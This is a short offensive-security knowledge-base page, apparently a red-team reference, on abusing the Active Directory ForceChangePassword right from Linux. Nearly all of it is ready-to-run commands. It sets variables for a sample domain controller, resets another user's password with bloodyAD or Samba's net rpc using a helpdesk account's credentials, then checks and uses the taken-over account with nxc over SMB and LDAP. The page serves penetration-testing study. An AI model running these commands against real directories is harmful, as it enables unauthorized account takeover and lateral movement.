Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / ACL Abuse / ForceChangePassword / Techniques

Linux

Set variables:

export DC=10.10.10.200
export DOMAIN=ootw.local

Reset the target password with bloodyAD:

bloodyAD -d $DOMAIN --host $DC -u helpdesk.one -p 'Helpdesk2026!' set password dylan.brooks 'ResetPass2026!'

Validate the new credential:

nxc smb $DC -d $DOMAIN -u dylan.brooks -p 'ResetPass2026!'
nxc ldap $DC -d $DOMAIN -u dylan.brooks -p 'ResetPass2026!'

Alternative with Samba tooling:

net rpc password dylan.brooks 'ResetPass2026!' -U 'OOTW/helpdesk.one%Helpdesk2026!' -S $DC

Check access with the reset account:

nxc smb $DC -d $DOMAIN -u dylan.brooks -p 'ResetPass2026!' --shares
nxc ldap $DC -d $DOMAIN -u dylan.brooks -p 'ResetPass2026!' --users